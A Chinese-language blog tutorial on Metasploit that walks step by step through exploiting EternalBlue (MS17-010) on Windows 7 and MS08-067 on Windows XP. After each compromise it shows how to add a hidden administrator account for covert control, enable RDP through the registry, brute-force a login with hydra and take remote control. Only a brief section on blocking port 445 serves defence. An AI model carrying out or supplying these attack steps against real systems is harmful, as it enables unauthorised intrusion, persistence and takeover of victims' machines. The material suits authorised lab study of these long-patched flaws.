metasploit滲透測試

一些常用指令

msfconsole 打開控制檯終端
msfupdate 更新
help [command] e.g. help search 命令使用幫助信息
search […] e.g. search portscan

use … 選擇滲透攻擊模塊
show payloads 查看與該攻擊模塊相兼容的攻擊載荷
set payload … 設置攻擊載荷
set target 設置目標
show options 查看需要設置的配置參數
exploit 實施滲透攻擊

metasploit滲透攻擊模塊在目錄/usr/share/metasploit-framework/modules/exploits

nmap <掃描選項><掃描目標>

攻擊實例

1、利用永恆之藍(ms17_010)漏洞攻擊win7

  1. 打開metasploit
    msfconsole
  2. 使用永恆之藍模塊
    search ms17-01
    use exploit/windows/smb/ms17_010_eternalblue
  3. 填充各種指令,主要是靶機IP,其中445端口已經默認了,其他不用改
    show options
    set RHOST 192.168.12.1
  4. 攻擊
    exploit或者run
  5. 創建新用戶,偷偷的控制使用
    net user admin 123456 /add
  6. 提權,將新創建的用戶admin提到管理員權限
    net localgroup administrators admin /add
    查看權限:
    net user admin

防禦辦法:
1,網上下載補丁,
2,關閉445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
檢測445端口是否開啓:
netstat -ano -p tcp | find “445”

2、利用Windows Server服務RPC請求緩衝區溢出漏洞(ms_08067)入侵WinXP

  1. 在msfconsole使用search命令搜索MS08067漏洞攻擊程序
  2. 使用use命令調用MS08067漏洞攻擊程序
    use exploit/windows/smb/ms08_067_netapi
  3. 使用show options 命令查看需要設置的選項
    可以看到還需設置RHOST(目標地址)、Exploit target(攻擊目標)
    使用 set 命令設置 Module Options,此處需要設置目標IP
  4. 接着設置Exploit target,使用show targets 查看可選項
    可以看出哪些版本的系統存在此漏洞,攻擊的XP系統爲WinXP SP3 簡體中文版,即使用set target 命令設置目標,此處即爲set target 34
  5. 此時再用show options 可以看到全部設置完成,接着使用exploit 或者 run 進行攻擊,執行exploit命令後得到一個meterpreter
  6. 在meterpreter中輸入shell即可進入CMD窗口
  7. 可以進行一些攻擊,如遠程桌面控制:
    —-打開RDP服務
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    —-使用netstat -an命令查看端口是否開放
    —-接着使用net user命令查看XP系統中的用戶
    net user
    —-然後針對指定用戶比如sysorem用戶進行登錄密碼爆破
    hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
    —-使用hydra爆破密碼得:12345接着就能直接登錄XP進行遠程控制
    rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
    —-完成遠程控制
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章